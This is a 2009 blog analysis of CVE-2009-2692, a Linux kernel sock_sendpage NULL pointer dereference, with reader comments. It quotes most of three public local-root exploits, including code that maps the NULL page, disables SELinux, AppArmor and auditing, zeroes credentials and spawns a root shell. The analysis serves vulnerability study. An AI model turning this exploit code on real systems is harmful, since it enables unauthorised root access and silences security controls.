CVE-2009-2692: Linux kernel proto_ops NULL Pointer Dereference

It seems like another neat local root was killed while I was at HAR. The bug was disclosed by Tavis Ormandy and Julien Tinnes of the Google Security Team on 13 August 2009 and it affects Linux kernel 2.6 through 2.6.30.4 and 2.4.4 through 2.4.37.4 as we can read in the original CVE ID. You can also read the original advisory here.
In Linux kernel, each socket includes a structure known as ‘proto_ops’ which is defined at include/linux/net.h and it contains function pointers for various operations like:

struct proto_ops {
        int             family;
        struct module   *owner;
        int             (*release)   (struct socket *sock);
        int             (*bind)      (struct socket *sock,
                                      struct sockaddr *myaddr,
                                      int sockaddr_len);
        int             (*connect)   (struct socket *sock,
                                      struct sockaddr *vaddr,
                                      int sockaddr_len, int flags);
        int             (*socketpair)(struct socket *sock1,
                                      struct socket *sock2);
        int             (*accept)    (struct socket *sock,
                                      struct socket *newsock, int flags);
     ...
};

If the socket has some ‘proto_ops’ operation that it’s not implemented, then functions such as sock_no_bind(), sock_no_connect(), sock_no_accept() etc. will be invoked from net/core/sock.c. Here are two examples of such routines:

/*
 * Set of default routines for initialising struct proto_ops when
 * the protocol does not support a particular function. In certain
 * cases where it makes no sense for a protocol to have a "do nothing"
 * function, some default processing is provided.
 */

int sock_no_bind(struct socket *sock, struct sockaddr *saddr, int len)
{
        return -EOPNOTSUPP;
}

int sock_no_connect(struct socket *sock, struct sockaddr *saddr,
                    int len, int flags)
{
        return -EOPNOTSUPP;
}

As the authors of the advisory say, normally, those function pointers should be checked before being invoked like this:

static ssize_t sock_splice_read(struct file *file, loff_t *ppos,
                                struct pipe_inode_info *pipe, size_t len,
                                unsigned int flags)
{
        struct socket *sock = file->private_data;

        if (unlikely(!sock->ops->splice_read))
                return -EINVAL;

        return sock->ops->splice_read(sock, ppos, pipe, len, flags);
}

Here, sock_splice_read() checks if ‘sock->ops->splice_read’ is NULL. It will attempt to use that callback routine only if it is not NULL. However, J. Tinnes and T. Ormandy found that sock_sendpage() does not validate the operations’ function pointer before using it. Here is the susceptible code from net/socket.c.

static ssize_t sock_sendpage(struct file *file, struct page *page,
                             int offset, size_t size, loff_t *ppos, int more)
{
        struct socket *sock;
        int flags;

        sock = file->private_data;

        flags = !(file->f_flags & O_NONBLOCK) ? 0 : MSG_DONTWAIT;
        if (more)
                flags |= MSG_MORE;

        return sock->ops->sendpage(sock, page, offset, size, flags);
}

This code will immediately use ‘sock->ops->sendpage’ function pointer with no further checks. This means that it relies entirely in the ‘proto_ops’ structure initialization. T. Ormandy and J. Tinnes also found that there are a few protocols that do not perform sufficient initializations. Specifically, SOCKOPS_WRAP() macro of include/linux/net.h was not succesfully initializing protocol families: PF_APPLETALK, PF_IPX, PF_IRDA, PF_X25 and PF_AX25 as well as PF_BLUETOOTH, PF_IUCV, PF_INET6 (with IPPROTO_SCTP), PF_PPPOX and PF_ISDN.
To fix this, the following patch was applied:

        if (more)
                flags |= MSG_MORE;
 
-       return sock->ops->sendpage(sock, page, offset, size, flags);
+       return kernel_sendpage(sock, page, offset, size, flags);
 }

In order to use the function kernel_sendpage() which is definitely not NULL. Now, the exploitation is trivial. The authors included this trigger code in their advisory:

/* ... */
    int fdin = mkstemp(template);
    int fdout = socket(PF_PPPOX, SOCK_DGRAM, 0);

    unlink(template);

    ftruncate(fdin, PAGE_SIZE);

    sendfile(fdout, fdin, NULL, PAGE_SIZE);
/* ... */

They simply create a temporary file and a PF_PPPOX socket, unlink and truncate the temporary file to size of PAGE_SIZE, and at last invoke sendfile(2) system call to send the data to the PF_PPPOX socket, from ‘fdin’ file at offset NULL. sendfile(2) internally uses sendpage() routine and consequently, this will trigger a NULL pointer dereference when attempting to execute ‘sock->ops->sendpage’ which would be NULL.
spender wrote two exploit codes for that bug and publish it as wunderbar_emporium.tgz and wunderbar_emporium2.tgz respectively.
Let’s have a look at his first code…
The tarball includes four files. File ‘tzameti.avi’ is a common AVI video, so we don’t care about that. Also, ‘pwnkernel.c’ is a simple executable that sets the personality(2) to SystemV Release4 and invokes pulseaudio with the ‘exploit.c’ as a module. This technique was introduced by J. Tinnes to bypass MMAP_MIN_ADDR protection when pulseaudio is installed.
Now, the actual exploit code resides at ‘exploit’ and starts like that:

int called_from_main = 0;
     ...
int main(void)
{
  called_from_main = 1;
  pa__init(NULL);
}

And guess what? pa__init() is the initialization routine that pulseaudio will execute as a module through -L flag. It goes like this:

int pa__init(void *m)
{
        char *mem = NULL;
        int d;
        int ret;

        our_uid = getuid();

        if ((personality(0xffffffff)) != PER_SVR4) {
                mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
                if (mem != NULL) {
                        /* for old kernels with SELinux that don't allow RWX anonymous mappings
                           luckily they don't have NX support either ;) */
                        mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
                        if (mem != NULL) {
                                fprintf(stdout, "UNABLE TO MAP ZERO PAGE!\n");
                                return 1;
                        }
                }
        } else {
                ret = mprotect(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
                if (ret == -1) {
                        fprintf(stdout, "UNABLE TO MPROTECT ZERO PAGE!\n");
                        return 1;
                }
        }

        fprintf(stdout, " [+] MAPPED ZERO PAGE!\n");

So, if the execution personality is not that of PER_SVR4, then it will attempt to map the first page of the system starting at NULL address with read, write and execute permission. If this fails, it could be because some kernels with SELinux don’t allow rwx mappings as the comment states. However, since they do not implemenet NX bit, you can map this just as read + write. However, if the personality was that of System V Release 4, it will use mprotect(2) to change the NULL page to rwx. The following code from that function is:

        selinux_enforcing = (int *)get_kernel_sym("selinux_enforcing");
        selinux_enabled = (int *)get_kernel_sym("selinux_enabled");
        apparmor_enabled = (int *)get_kernel_sym("apparmor_enabled");
        apparmor_complain = (int *)get_kernel_sym("apparmor_complain");
        apparmor_audit = (int *)get_kernel_sym("apparmor_audit");
        apparmor_logsyscall = (int *)get_kernel_sym("apparmor_logsyscall");
        security_ops = (unsigned long *)get_kernel_sym("security_ops");
        default_security_ops = get_kernel_sym("default_security_ops");
        sel_read_enforce = get_kernel_sym("sel_read_enforce");
        audit_enabled = (int *)get_kernel_sym("audit_enabled");
        commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
        prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred");

Function get_kernel_sym() is a simple parser/scanner of /proc/kallsyms or /proc/ksyms that will return the address of the symbol passed to it as an argument. Its code is simple as you can read here:

static unsigned long get_kernel_sym(char *name)
{
        FILE *f;
        unsigned long addr;
        char dummy;
        char sname[256];
        int ret;

        f = fopen("/proc/kallsyms", "r");
        if (f == NULL) {
                f = fopen("/proc/ksyms", "r");
                if (f == NULL) {
                        fprintf(stdout, "Unable to obtain symbol listing!\n");
                        return 0;
                }
        }

        ret = 0;
        while(ret != EOF) {
                ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
                if (ret == 0) {
                        fscanf(f, "%s\n", sname);
                        continue;
                }
                if (!strcmp(name, sname)) {
                        fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr);
                        fclose(f);
                        return addr;
                }
        }

        fclose(f);
        return 0;
}

After retriving all of the above symbols from the running kernel, the exploit does this:

        mem[0] = '\xff';
        mem[1] = '\x25';
        *(unsigned int *)&mem[2] = (sizeof(unsigned long) != sizeof(unsigned int)) ? 0 : 6;
        *(unsigned long *)&mem[6] = (unsigned long)&own_the_kernel;

He places 0xff to NULL, 0x25 to NULL+1, on 32bit architectures 0 to NULL+2 and 6 on 64bit and finally, NULL+6 is initialized with the address of ‘own_the_kernel’ routine. Let’s move to this routine…

static int __attribute__((regparm(3))) own_the_kernel(unsigned long a, unsigned long b, unsigned long c, unsigned long d, unsigned long e)
{
        got_ring0 = 1;

        if (audit_enabled)
                *audit_enabled = 0;

        // disable apparmor
        if (apparmor_enabled && *apparmor_enabled) {
                what_we_do = 1;
                        *apparmor_enabled = 0;
                if (apparmor_audit)
                        *apparmor_audit = 0;
                if (apparmor_logsyscall)
                        *apparmor_logsyscall = 0;
                if (apparmor_complain)
                        *apparmor_complain = 0;
        }

First of all, GCC’s attribute regparm will cause the three first arguments of own_the_kernel() routine to be passed through registers as we can read from GCC’s documentation. It then checks for Auditing support and AppArmor and sets those pointers to NULL in case of being set. By doing this, he disables those protections. The code continues like this:

        // disable SELinux
        if (selinux_enforcing && *selinux_enforcing) {
                what_we_do = 2;
                *selinux_enforcing = 0;
        }

        if (!selinux_enabled || selinux_enabled && *selinux_enabled == 0) {
                // trash LSM
                if (default_security_ops && security_ops) {
                        if (*security_ops != default_security_ops)
                                what_we_do = 3;
                        *security_ops = default_security_ops;
                }
        }

Here, SELinux enforcing is also set to 0 in case of having a non-zero value, security options are set to default security options. The following code in own_the_kernel() routine is:

        /* make the idiots think selinux is enforcing */
        if (sel_read_enforce) {
                unsigned char *p;
                unsigned long _cr0;

                asm volatile (
                "mov %%cr0, %0"
                : "=r" (_cr0)
                );
                _cr0 &= ~0x10000;
                asm volatile (
                "mov %0, %%cr0"
                :
                : "r" (_cr0)
                );
                if (sizeof(unsigned int) != sizeof(unsigned long)) {
                        /* 64bit version, look for the mov ecx, [rip+off]
                           and replace with mov ecx, 1
                        */
                        for (p = (unsigned char *)sel_read_enforce; (unsigned long)p < (sel_read_enforce + 0x30); p++) {
                                if (p&#91;0&#93; == 0x8b && p&#91;1&#93; == 0x0d) {
                                        p&#91;0&#93; = '\xb9';
                                        p&#91;5&#93; = '\x90';
                                        *(unsigned int *)&p&#91;1&#93; = 1;
                                }
                        }
&#91;/sourcecode&#93;

This is a clever approach. He retrieves the contents of CR0 control register and stores it into '_cr0' local variable. Then, if this is a 64bit platform (have a look at 'int' is 4 bytes and 'long' is 8 bytes check), it will scan the 0x30 (48 in decimal) bytes of that function to find the "mov ecx, &#91;rip+off&#93;" and replace it with "mov ecx, 1" as the comments describe. If the system is a 32bit architecture, the following code will be executed:

&#91;sourcecode language="c"&#93;
                } else {
                        /* 32bit, replace push &#91;selinux_enforcing&#93; with push 1 */
                        for (p = (unsigned char *)sel_read_enforce; (unsigned long)p < (sel_read_enforce + 0x20); p++) {
                                if (p&#91;0&#93; == 0xff && p&#91;1&#93; == 0x35) {
                                        // while we're at it, disable
                                        // SELinux without having a
                                        // symbol for selinux_enforcing ;)
                                        if (!selinux_enforcing) {
                                                sel_enforce_ptr = *(unsigned int **)&p&#91;2&#93;;
                                                *sel_enforce_ptr = 0;
                                                what_we_do = 2;
                                        }
                                        p&#91;0&#93; = '\x68';
                                        p&#91;5&#93; = '\x90';
                                        *(unsigned int *)&p&#91;1&#93; = 1;
                                }
                        }
                }
                _cr0 |= 0x10000;
                asm volatile (
                "mov %0, %%cr0"
                :
                : "r" (_cr0)
                );
        }
&#91;/sourcecode&#93;

This is pretty much the same thing for different architecture. It scans 'sel_read_enforce' up to 'sel_read_enforce+0x20' to find the specified bytes and patch it. Finally, flag 0x10000 (which is the X86_CR0_WP, also known as Write Protect flag defined at arch/x86/include/asm/processor-flags.h) is set on '_cr0' variable which is later loaded into CR0 control register. Now, that the LSM are disabled, own_the_kernel() routine is finished like this:

&#91;sourcecode language="c"&#93;

        // push it real good
        give_it_to_me_any_way_you_can();

        return -1;
}
&#91;/sourcecode&#93;

It is the usual shellcode for Linux kernel exploitation as you can easily see here...

&#91;sourcecode language="c"&#93;
static void give_it_to_me_any_way_you_can(void)
{
        if (commit_creds && prepare_kernel_cred) {
                commit_creds(prepare_kernel_cred(0));
                got_root = 1;
&#91;/sourcecode&#93;

This code checks that credentials have been retrieved through procfs and it calls commit_creds() defined at kernel/cred.c passing to it the return value of prepare_kernel_cred() for our task_struct. This will set flag 'got_root' to 1. If any of those two routines were not set, the code path will be:

&#91;sourcecode language="c"&#93;
        } else {
                unsigned int *current;
                unsigned long orig_current;
                unsigned long orig_current_4k = 0;

                if (sizeof(unsigned long) != sizeof(unsigned int))
                        orig_current = get_current_x64();
                else {
                        orig_current = orig_current_4k = get_current_4k();
                        if (orig_current == 0)
                                orig_current = get_current_8k();
                }
&#91;/sourcecode&#93;

Depending on the architecture, get_current_x64(), get_current_4k() and/or get_current_8k() will be invoked. Those are three simple routines that retrieve the task_struct location of our process.

&#91;sourcecode language="c"&#93;
static inline unsigned long get_current_4k(void)
{
        unsigned long current = 0;
#ifndef __x86_64__
        asm volatile (
        " movl %%esp, %0;"
        : "=r" (current)
        );
#endif
        current = *(unsigned long *)(current & 0xfffff000);
        if (current < 0xc0000000 || current > 0xfffff000)
                return 0;

        return current;
}

static inline unsigned long get_current_8k(void)
{
        unsigned long current = 0;

#ifndef __x86_64__
        asm volatile (
        " movl %%esp, %0;"
        : "=r" (current)
        );
#endif
        current &= 0xffffe000;
        eightk_stack = 1;
        if ((*(unsigned long *)current < 0xc0000000) || (*(unsigned long *)current > 0xfffff000)) {
                twofourstyle = 1;
                return current;
        }
        return *(unsigned long *)current;
}

static inline unsigned long get_current_x64(void)
        unsigned long current = 0;
#ifdef __x86_64__
        asm volatile (
        "movq %%gs:(0), %0"
        : "=r" (current)
        );
#endif
        return current;
}

Having the exact location of our process’ task_struct allows to move on and execute this:

repeat:
                current = (unsigned int *)orig_current;
                while (((unsigned long)current < (orig_current + 0x1000 - 17 )) &&
                        (current&#91;0&#93; != our_uid || current&#91;1&#93; != our_uid ||
                         current&#91;2&#93; != our_uid || current&#91;3&#93; != our_uid))
                        current++;

                if ((unsigned long)current >= (orig_current + 0x1000 - 17 )) {
                        if (orig_current == orig_current_4k) {
                                orig_current = get_current_8k();
                                goto repeat;
                        }
                        return;
                }
                got_root = 1;
                memset(current, 0, sizeof(unsigned int) * 8);
        }

        return;
}

This scans almost the entire task_struct’s page to find our user’s credentials and set them to 0 (which is the ID of root) using memset() library routine. Finally, we can move back to main() and continue from where we’ve left…

        /* trigger it */
        {
                char template[] = "/tmp/sendfile.XXXXXX";
                int in, out;

                // Setup source descriptor
                if ((in = mkstemp(template)) < 0) {
                        fprintf(stdout, "failed to open input descriptor, %m\n");
                        return 1;
                }

                unlink(template);
&#91;/sourcecode&#93; 

This is a common temporary file creation and unlinking...

&#91;sourcecode language="c"&#93;
#define DOMAINS_STOP -1
   ...
const int domains&#91;&#93;&#91;3&#93; = { { PF_APPLETALK, SOCK_DGRAM, 0 },
        {PF_IPX, SOCK_DGRAM, 0 }, { PF_IRDA, SOCK_DGRAM, 0 },
        {PF_X25, SOCK_DGRAM, 0 }, { PF_AX25, SOCK_DGRAM, 0 },
        {PF_BLUETOOTH, SOCK_DGRAM, 0 }, { PF_IUCV, SOCK_STREAM, 0 },
        {PF_INET6, SOCK_SEQPACKET, IPPROTO_SCTP },
        {PF_PPPOX, SOCK_DGRAM, 0 },
        {PF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP },
        {DOMAINS_STOP, 0, 0 }
        };
   ...
                // Find a vulnerable domain
                d = 0;
repeat_it:
                for (; domains&#91;d&#93;&#91;0&#93; != DOMAINS_STOP; d++) {
                        if ((out = socket(domains&#91;d&#93;&#91;0&#93;, domains&#91;d&#93;&#91;1&#93;, domains&#91;d&#93;&#91;2&#93;)) >= 0)
                                break;
                }

                if (out < 0) {
                        fprintf(stdout, "unable to find a vulnerable domain, sorry\n");
                        return 1;
                }

                // Truncate input file to some large value
                ftruncate(in, getpagesize());

                // sendfile() to trigger the bug.
                sendfile(out, in, NULL, getpagesize());
        }
&#91;/sourcecode&#93;

Here, it scans 'domains' array until it finds a protocol family that is allowed to create a socket. If it finds one, it will break from the for loop and truncate the 'in' temporary file to the size of a page, and finally, trigger the bug through sendfile(2) system call as J. Tinnes demonstrated. This will lead to the execution of the exploit's own_the_kernel() which is placed at NULL page in the position of sock-&gt;ops-&gt;sendpage callback function.
If everything works as expected, the main() routine will continue like this:

&#91;sourcecode language="c"&#93;
        if (got_ring0) {
                fprintf(stdout, " &#91;+&#93; got ring0!\n");
        } else {
                d++;
                goto repeat_it;
        }

        fprintf(stdout, " &#91;+&#93; detected %s %dk stacks\n",
                twofourstyle ? "2.4 style" : "2.6 style",
                eightk_stack ? 8 : 4);

        extract_and_play_video();
&#91;/sourcecode&#93;

If it failed, it will attempt to jump back to the trigger code and re-execute the exploit. Otherwise, it will call extract_and_play_video() which is a simple routine that extracts the video using fseek() to jump to its location and then plays it using mplayer. The last part of main() is exactly what you'll be expecting:

&#91;sourcecode language="c"&#93;
        {
                char *msg;
                switch (what_we_do) {
                        case 1:
                                msg = "AppArmor";
                                break;
                        case 2:
                                msg = "SELinux";
                                break;
                        case 3:
                                msg = "LSM";
                                break;
                        default:
                                msg = "nothing, what an insecure machine!";
                }
                fprintf(stdout, " &#91;+&#93; Disabled security of : %s\n", msg);
        }
        if (got_root == 1)
                fprintf(stdout, " &#91;+&#93; Got root!\n");
        else {
                fprintf(stdout, " &#91;+&#93; Failed to get root :( Something's wrong.  Maybe the kernel isn't vulnerable?\n");
                exit(0);
        }

        execl("/bin/sh", "/bin/sh", "-i", NULL);

        return 0;
}
&#91;/sourcecode&#93;

It checks the flag 'what_we_do' and informs the user of what security modules have been disabled, and at last... it spawns a new /bin/sh process with credentials set to 0.
The second release of wunderbar emporium exploit is <a href="http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz">wunderbar_emporium2.tgz</a> which differs from the first release only in wunderbar_emporium.sh. The second release uses /selinux/enforce instead of /usr/sbin/getenforce and runs the exploit using runcon(1) in the security context of various applications that could be able to map NULL page. Those include wine_t, vbetool_t, unconfined_mono_t and samba_unconfined_net_t. 
Another <a href="http://www.frasunek.com/proto_ops.tgz">exploit was released</a> by <a href="http://www.frasunek.com/">Przemysław Frasunek</a>. The main() routine is quite simple. He sets the personality to SystemV R4, maps the NULL page and puts kernel_code() function to the location of the callback function of sendpage. The trigger code is almost exactly the same as the one in spender's code...


int main(void) {
        char template[] = "/tmp/padlina.XXXXXX";
        int fdin, fdout;
        void *page;

        uid = getuid();
        gid = getgid();
        setresuid(uid, uid, uid);
        setresgid(gid, gid, gid);

        if ((personality(0xffffffff)) != PER_SVR4) {
                if ((page = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
                        perror("mmap");
                        return -1;
                }
        } else {
                if (mprotect(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) {
                        perror("mprotect");
                        return -1;
                }
        }

        *(char *)0 = '\x90';
        *(char *)1 = '\xe9';
        *(unsigned long *)2 = (unsigned long)&kernel_code - 6;

        if ((fdin = mkstemp(template)) < 0) {
                perror("mkstemp");
                return -1;
        }

        if ((fdout = socket(PF_PPPOX, SOCK_DGRAM, 0)) < 0) {
                perror("socket");
                return -1;
        }

        unlink(template);
        ftruncate(fdin, PAGE_SIZE);
        sendfile(fdout, fdin, NULL, PAGE_SIZE);
}
&#91;/sourcecode&#93;

Function kernel_code() is a common scan-for-UIDs-in-tast_struct routine.

&#91;sourcecode language="c"&#93;
void kernel_code()
{
        int i;
        uint *p = get_current();

        for (i = 0; i < 1024-13; i++) {
                if (p&#91;0&#93; == uid && p&#91;1&#93; == uid && p&#91;2&#93; == uid && p&#91;3&#93; == uid && p&#91;4&#93; == gid && p&#91;5&#93; == gid && p&#91;6&#93; == gid && p&#91;7&#93; == gid) {
                        p&#91;0&#93; = p&#91;1&#93; = p&#91;2&#93; = p&#91;3&#93; = 0;
                        p&#91;4&#93; = p&#91;5&#93; = p&#91;6&#93; = p&#91;7&#93; = 0;
                        p = (uint *) ((char *)(p + 8) + sizeof(void *));
                        p&#91;0&#93; = p&#91;1&#93; = p&#91;2&#93; = ~0;
                        break;
                }
                p++;
        }

        exit_kernel();
}
&#91;/sourcecode&#93;

And get_current() is a another simple routine for retrieving the task_struct's location for our process for x86.

&#91;sourcecode language="c"&#93;
static inline __attribute__((always_inline)) void *get_current()
{
        unsigned long curr;
        __asm__ __volatile__ (
                "movl %%esp, %%eax ;"
                "andl %1, %%eax ;"
                "movl (%%eax), %0"
                : "=r" (curr)
                : "i" (~8191)
        );
        return (void *) curr;
}
&#91;/sourcecode&#93;

And finally, exit_kernel() is a routine to return smoothly to user space through an interrupt return and execute exit_code()...

&#91;sourcecode language="c"&#93;
static inline __attribute__((always_inline)) void exit_kernel()
{
        __asm__ __volatile__ (
                "movl %0, 0x10(%%esp) ;"
                "movl %1, 0x0c(%%esp) ;"
                "movl %2, 0x08(%%esp) ;"
                "movl %3, 0x04(%%esp) ;"
                "movl %4, 0x00(%%esp) ;"
                "iret"
                : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
                    "i" (USER_CS), "r" (exit_code)
        );
}

     ...

void exit_code()
{
        if (getuid() != 0) {
                fprintf(stderr, "failed\n");
                exit(-1);
        }

        execl("/bin/sh", "sh", "-i", NULL);
}
&#91;/sourcecode&#93;

This is probably one of the most straightforward to exploit NULL pointer dereference vulnerabilities in the Linux kernel.

<strong>UPDATE:</strong>
Also, please <a href="http://c-skills.blogspot.com/2009/08/note-on-cve-2009-2692.html">read this post of stealth</a>.

<strong>UPDATE (19 Aug 2009):</strong>

Another cool exploit for that issue on Android was <a href="http://milw0rm.com/sploits/android-root-20090816.tar.gz">released by Zinx</a>. As we can read from the Makefile, the exploit is compiled for ARM architecture like this:


ifdef TOPDIR

obj-m += own.o

else

default:
	$(MAKE) -C $(KERNEL_DIR) ARCH=arm CROSS_COMPILE=$(CROSS_COMPILE) KBUILD_VERBOSE=1 M=$(PWD) modules

distclean:
	rm -f *.ko *.o .*.cmd *.mod.c Module.symvers modules.order

endif

The actual exploit code is fairly simple. File rootsh.c starts out like this:

int main(void)
{
	do_get_root();

	if (got_root == 1) {
		printf("Got root!\n");
	} else {
		printf("Didn't get root.\n");
		return -1;
	}

	execl("/system/bin/sh", "/system/bin/sh", "-", NULL);
	return -1;
}

And do_get_root() routine is the previously shown trigger code…

static void do_get_root(void)
{
	int fdin, fdout;
	char template[] = "/sdcard/droidsploidXXXXXX";

	printf("ROOTING\n");

	fdin = mkstemp(template);
	unlink(template);
	ftruncate(fdin, PAGE_SIZE);

	fdout = socket(PF_BLUETOOTH, SOCK_DGRAM, 0);
	sendfile(fdout, fdin, NULL, PAGE_SIZE);

	return;
}

The awesome part of the exploit is how it inserts a function into the NULL page. By having a look at own.c we can read this:

int __attribute__((section(".null"))) root_sendpage(void *sk, void *page, int offset, size_t size, int flags)
{
	current->uid = current->euid = 0;
	current->gid = current->egid = 0;
	got_root = 1;
	return -ECONNREFUSED;
}

And as we can read from GCC’s documentation, this atribute is used to insert some code to the specified section instead of .TEXT which is the default one. The rest of the code is extremely straightfoward, it just sets EUID and EGID to those of root. So, the author includes a linker script named armelf.x. This script among others defines these:

/* Do we need any of these for elf?
   __DYNAMIC = 0;    */
MEMORY {
  allspace (rwx) : org = 0x8000, len = 32M
  nullspace (rwx) : org = 0, len = 0x1000
}
SECTIONS
{
     ...
  .null           :
  {
    *(.null)
  } >nullspace

So, it introduces a new section named .NULL which starts at address 0 and has length of exactly one page (0x1000 which is 4096 in decimal) with rwx permissions. This is where root_sendpage() routine is inserted and the trigger of the bug will result in executing this in kernel’s context of execution. Pretty nice exploit approach.

Written by xorl

August 18, 2009 at 18:21

Posted in linux, vulnerabilities

11 Responses

Subscribe to comments with RSS.

Excellent write up as usual :-)

(Btw, the mmap_min_addr bypass was discovered by both Julien and me :)).

Tavis Ormandy

August 18, 2009 at 20:20
There is one thing that I can’t understand…
In Przemysław Frasunek’s exploit in line:
*(unsigned long *)2 = (unsigned long)&kernel_code – 6;
We are subbing 6 from address of kernel_code() because we want to hit into the ret instruction from previous function?

Clay

August 19, 2009 at 13:47
needs more “why” instead of “what” — otherwise you miss a bit of subtle magic :p

just an example: it’s obvious that i set 0xff and 0x25, etc, but the “why” is what’s important.

spender

August 20, 2009 at 04:22
Good write up, mate.

Bishan Kochher

August 20, 2009 at 10:04
First of all, sorry for the extremely delayed replies. I have some issues that are more important than a hobby blog atm.

@Clay: i’m not sure. You can ask the author of the exploit code.

@spender: Enlighten me. I guess that it has something to do with the reliability/stability of the kernel after the exploitation.

xorl

August 22, 2009 at 12:53
With little modification:
*(unsigned long *)2 = (unsigned long)&kernel_code;

I got segmentation fault:
Code: Bad EIP value.
EIP: [] 0x8048800 SS:ESP 0068:eae6dde0

BUT if I paste in first line kernel_code() function something like this:
__asm__ (“ret”);

or:
__asm__ (“leave”);

of even:
__asm__ (“mov $0x1, %eax”);

then everything is perfect (almost)…

but if I use:
__asm__ (“nop”);

again I got SIGSEGV. I think this is my last comment.
@xorl: author not response for my email.

Clay

August 23, 2009 at 03:14
@Clay: You must use -6 since the JMP instruction’s displacement is relative to the current address (which is 6 = 2 1-byte opcodes + 4 bytes kernel_code() address).

@xorl: Although this is not the appropriate blog entry, I hope this post is not too late! I wish you good luck with whatever you are up to from now on. All the best!

./hk

huku

August 25, 2009 at 22:38
@Clay: No surprise he didn’t answer you. Nobody is interested in teaching kids (no offense) trivial things. What about two preceding bytes, aren’t they any relevant ? Bingo! :)

qaaz

August 25, 2009 at 22:53
http://www.doecirc.energy.gov/bulletins/t-217.shtml
can u tell me how to trigger that vuln
10x :)

hogz

August 27, 2009 at 10:43
@hogs: My google search for that bug returned this:
http://pastebin.ca/1545178
Hope this helps.

xorl

August 27, 2009 at 22:36
http://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html

0x0

August 30, 2009 at 17:17

xorl %eax, %eax